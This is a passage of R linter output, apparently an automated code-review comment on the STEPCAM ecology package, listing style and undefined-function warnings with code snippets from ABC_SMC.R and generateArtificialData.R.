stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:88:6:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L88) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:89:7:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L89) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L91) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:18:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:18:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:18:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:13:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:102:17:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:103:16:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:16:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:16:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:111:21:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L111) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:112:26:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L112) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:16:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:120:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L120) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:7:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L124) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:124:10:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:23:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L124) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:124:29:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:5:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L146) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:12:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:29:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L158) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L160) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:162:19:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L162) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:190:20:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L190) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:20:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L190) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:192:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L192) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L193) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L198) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:199:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L199) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:200:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L200) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:201:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L201) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:202:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L202) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L205) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:207:14:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:9:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:27:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:19:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:19:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:19:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:14:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:18:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:17:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:17:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:17:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:24:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:40:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L224) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:226:24:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:40:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L226) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:227:13:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:231:13:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L231) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:231:14:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L231) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:231:34:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L231) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:237:21:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L237) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:237:22:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L237) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:239:13:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L239) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:239:38:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L239) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:257:54:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L257) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:260:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L260) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:9:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:32:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L261) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:264:27:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L264) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:264:27:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:265:20:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L265) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:266:20:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L266) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:267:20:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L267) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:274:61:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L274) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:278:63:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L278) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:281:15:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L281) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:282:44:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/ABC_SMC.R#L282) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) 